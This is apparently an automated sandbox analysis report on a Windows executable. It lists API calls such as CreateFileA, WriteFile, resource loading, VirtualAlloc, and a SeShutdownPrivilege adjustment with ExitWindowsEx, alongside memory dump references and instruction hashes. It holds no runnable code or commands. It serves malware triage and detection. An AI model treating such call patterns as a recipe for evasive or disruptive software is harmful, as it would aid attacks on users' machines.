                                                                                                                                        • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658689577-0
                                                                                                                                        • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                        • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                                                                        • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                        • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                        • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                                        • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                        • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                        • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                                        • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                        • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                        • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                                        • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                        • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 442123175-0
                                                                                                                                        • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                        • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                                        • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                        • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                                        APIs
                                                                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatMessage
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1306739567-0
                                                                                                                                        • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                                        • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                                        • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                                        • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                                        APIs
                                                                                                                                        • SetEndOfFile.KERNEL32(?,02087FF4,0040AA59,00000000), ref: 004076B3
                                                                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 734332943-0
                                                                                                                                        • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                        • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                                        • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                        • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                        • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                                        • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                        • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                        • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                        • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                        • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                        APIs
                                                                                                                                        • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharPrev
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                        • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                        • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                        • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                        • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                                                        • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                        • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                        • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                        • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                        • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                        • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                        • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                        • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                        • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                        • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                        • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                        • API String ID: 107509674-3733053543
                                                                                                                                        • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                        • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                        • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                        • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                        APIs
                                                                                                                                        • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                                                        • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                        • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                                        • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                                                        • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                                        • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                                        • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                                                        • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                                        • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SystemTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2656138-0
                                                                                                                                        • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                        • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                                                        • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                        • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Version
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                        • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                                        • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                                                        • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                                        • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                                                        • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                                                        • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                                                        • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                                                        APIs
